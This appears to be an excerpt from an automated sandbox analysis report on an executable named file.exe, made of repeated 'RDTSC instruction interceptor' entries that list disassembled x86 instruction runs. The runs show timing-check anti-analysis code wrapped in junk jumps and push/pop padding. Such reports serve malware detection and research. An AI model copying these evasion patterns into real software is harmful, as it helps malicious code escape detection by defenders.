Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D06DF second address: 56D06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D06E3 second address: 56D0705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0705 second address: 56D076E instructions: 0x00000000 rdtsc 0x00000002 call 00007FD714BB0758h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FD714BB0757h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD714BB074Bh 0x0000001b or esi, 52A88A7Eh 0x00000021 jmp 00007FD714BB0759h 0x00000026 popfd 0x00000027 mov edi, eax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D076E second address: 56D0788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD714BB391Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0788 second address: 56D079E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D079E second address: 56D07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07A2 second address: 56D07A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07A8 second address: 56D0835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD714BB3928h 0x00000008 mov ch, E2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov eax, 3A0AC249h 0x00000014 mov cx, 3A05h 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a jmp 00007FD714BB3920h 0x0000001f xchg eax, esi 0x00000020 jmp 00007FD714BB3920h 0x00000025 push eax 0x00000026 jmp 00007FD714BB391Bh 0x0000002b xchg eax, esi 0x0000002c jmp 00007FD714BB3926h 0x00000031 lea eax, dword ptr [ebp-04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD714BB3927h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0835 second address: 56D083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D083B second address: 56D083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D08DD second address: 56D08E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0984 second address: 56D098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D098A second address: 56D098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D098E second address: 56D09AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD714BB3922h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D09AB second address: 56D0049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov dh, al 0x0000000d pushfd 0x0000000e jmp 00007FD714BB0751h 0x00000013 sbb cl, FFFFFFB6h 0x00000016 jmp 00007FD714BB0751h 0x0000001b popfd 0x0000001c popad 0x0000001d retn 0004h 0x00000020 nop 0x00000021 sub esp, 04h 0x00000024 xor ebx, ebx 0x00000026 cmp eax, 00000000h 0x00000029 je 00007FD714BB0893h 0x0000002f xor eax, eax 0x00000031 mov dword ptr [esp], 00000000h 0x00000038 mov dword ptr [esp+04h], 00000000h 0x00000040 call 00007FD7194EECDBh 0x00000045 mov edi, edi 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007FD714BB074Ch 0x0000004e sbb esi, 31207DE8h 0x00000054 jmp 00007FD714BB074Bh 0x00000059 popfd 0x0000005a mov ebx, eax 0x0000005c popad 0x0000005d xchg eax, ebp 0x0000005e jmp 00007FD714BB0752h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FD714BB074Eh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0049 second address: 56D004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D004F second address: 56D007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FD714BB0753h 0x00000014 pop ecx 0x00000015 push edi 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D007D second address: 56D00D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3922h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov ch, F8h 0x00000010 popad 0x00000011 push FFFFFFFEh 0x00000013 pushad 0x00000014 mov dx, 9026h 0x00000018 call 00007FD714BB3927h 0x0000001d mov dh, al 0x0000001f pop edx 0x00000020 popad 0x00000021 call 00007FD714BB3919h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD714BB391Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D00D4 second address: 56D00D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D00D8 second address: 56D00DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D00DE second address: 56D0101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD714BB074Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0101 second address: 56D0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD714BB3929h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0135 second address: 56D0139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0139 second address: 56D0153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0153 second address: 56D017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD714BB0754h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D017C second address: 56D01D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD714BB3924h 0x00000011 or ecx, 351948D8h 0x00000017 jmp 00007FD714BB391Bh 0x0000001c popfd 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push 0E22348Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD714BB3927h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D01D5 second address: 56D01F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 00B2235Ah 0x00000008 call 00007FD714BB074Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 7B8B1FFAh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D01F8 second address: 56D0201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 142Dh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0201 second address: 56D0249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB0759h 0x00000009 sbb cl, 00000036h 0x0000000c jmp 00007FD714BB0751h 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, DDCAh 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0249 second address: 56D0278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FD714BB3926h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD714BB391Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0278 second address: 56D02B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB0757h 0x00000009 sub cl, 0000002Eh 0x0000000c jmp 00007FD714BB0759h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D02B2 second address: 56D02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD714BB3923h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D02D1 second address: 56D0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB074Fh 0x00000009 and ah, FFFFFFEEh 0x0000000c jmp 00007FD714BB0759h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 sub esp, 18h 0x00000018 pushad 0x00000019 push eax 0x0000001a pushfd 0x0000001b jmp 00007FD714BB074Fh 0x00000020 sbb eax, 41C053FEh 0x00000026 jmp 00007FD714BB0759h 0x0000002b popfd 0x0000002c pop ecx 0x0000002d mov esi, edi 0x0000002f popad 0x00000030 push esi 0x00000031 jmp 00007FD714BB0758h 0x00000036 mov dword ptr [esp], ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD714BB0757h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0372 second address: 56D0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0378 second address: 56D037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D037C second address: 56D03C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c call 00007FD714BB3926h 0x00000011 mov di, ax 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007FD714BB391Dh 0x0000001e xchg eax, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD714BB391Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D03C3 second address: 56D03C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D03C9 second address: 56D0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD714BB3926h 0x0000000e xchg eax, edi 0x0000000f jmp 00007FD714BB3920h 0x00000014 mov eax, dword ptr [75AF4538h] 0x00000019 jmp 00007FD714BB3920h 0x0000001e xor dword ptr [ebp-08h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD714BB391Dh 0x0000002a sbb ah, 00000076h 0x0000002d jmp 00007FD714BB3921h 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0439 second address: 56D043E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D043E second address: 56D0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD714BB391Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0457 second address: 56D048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ax, 20D3h 0x0000000f mov ch, F7h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bx, E872h 0x0000001a mov edi, 24C419BEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D048B second address: 56D049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D049A second address: 56D053F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FD714BB0755h 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 jmp 00007FD714BB074Eh 0x00000016 mov dword ptr fs:[00000000h], eax 0x0000001c pushad 0x0000001d mov cx, F33Dh 0x00000021 pushfd 0x00000022 jmp 00007FD714BB074Ah 0x00000027 or ax, 7D18h 0x0000002c jmp 00007FD714BB074Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [ebp-18h], esp 0x00000036 jmp 00007FD714BB0756h 0x0000003b mov eax, dword ptr fs:[00000018h] 0x00000041 jmp 00007FD714BB0750h 0x00000046 mov ecx, dword ptr [eax+00000FDCh] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FD714BB0757h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D053F second address: 56D056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD714BB391Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D056D second address: 56D05A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FD714BB0798h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD714BB0758h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D05A4 second address: 56D05AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D05AA second address: 56D05EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov esi, ebx 0x0000000f pop edx 0x00000010 jmp 00007FD714BB0756h 0x00000015 popad 0x00000016 mov ecx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD714BB074Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D05EB second address: 56D05F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0262 second address: 56C02C1 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD714BB0758h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FD714BB074Bh 0x00000010 sbb ch, FFFFFFBEh 0x00000013 jmp 00007FD714BB0759h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FD714BB0751h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C02C1 second address: 56C02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C02C5 second address: 56C035B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FD714BB0751h 0x0000000e sub esp, 2Ch 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FD714BB074Ch 0x00000018 add cx, D248h 0x0000001d jmp 00007FD714BB074Bh 0x00000022 popfd 0x00000023 call 00007FD714BB0758h 0x00000028 movzx esi, di 0x0000002b pop ebx 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jmp 00007FD714BB0758h 0x00000034 mov esi, 11889EA1h 0x00000039 popad 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov dl, ah 0x00000040 call 00007FD714BB0755h 0x00000045 pop esi 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C035B second address: 56C03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FD714BB3924h 0x00000010 xchg eax, edi 0x00000011 jmp 00007FD714BB3920h 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FD714BB3927h 0x00000020 xor ax, 2ABEh 0x00000025 jmp 00007FD714BB3929h 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C03C6 second address: 56C03DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 20DFD807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a mov edx, 6C89E01Eh 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C03DE second address: 56C03E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C03E2 second address: 56C03E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C03E6 second address: 56C03EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C03EC second address: 56C0405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB0755h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0405 second address: 56C0409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C041D second address: 56C04B3 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 2548h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FD714BB0751h 0x0000000e or esi, 309267B6h 0x00000014 jmp 00007FD714BB0751h 0x00000019 popfd 0x0000001a popad 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD714BB074Dh 0x00000024 and eax, 42BFF916h 0x0000002a jmp 00007FD714BB0751h 0x0000002f popfd 0x00000030 movzx eax, bx 0x00000033 popad 0x00000034 mov edi, 00000000h 0x00000039 jmp 00007FD714BB0758h 0x0000003e inc ebx 0x0000003f jmp 00007FD714BB0750h 0x00000044 test al, al 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C04B3 second address: 56C04B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C04B7 second address: 56C04BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0558 second address: 56C056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C064F second address: 56C0673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB074Ch 0x00000009 or eax, 5E29B8E8h 0x0000000f jmp 00007FD714BB074Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0673 second address: 56C068A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-2Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD714BB391Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C068A second address: 56C06DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB074Fh 0x00000009 sub al, FFFFFFDEh 0x0000000c jmp 00007FD714BB0759h 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD714BB0759h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C06DB second address: 56C06E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C06E1 second address: 56C0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD714BB0756h 0x0000000e xchg eax, esi 0x0000000f jmp 00007FD714BB0750h 0x00000014 nop 0x00000015 jmp 00007FD714BB0750h 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d mov edi, esi 0x0000001f popad 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0732 second address: 56C0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0736 second address: 56C0750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0756h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0750 second address: 56C07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD714BB3924h 0x00000011 and ax, 84B8h 0x00000016 jmp 00007FD714BB391Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD714BB3928h 0x00000022 sbb esi, 0B8FBF18h 0x00000028 jmp 00007FD714BB391Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD714BB3924h 0x00000037 rdtsc
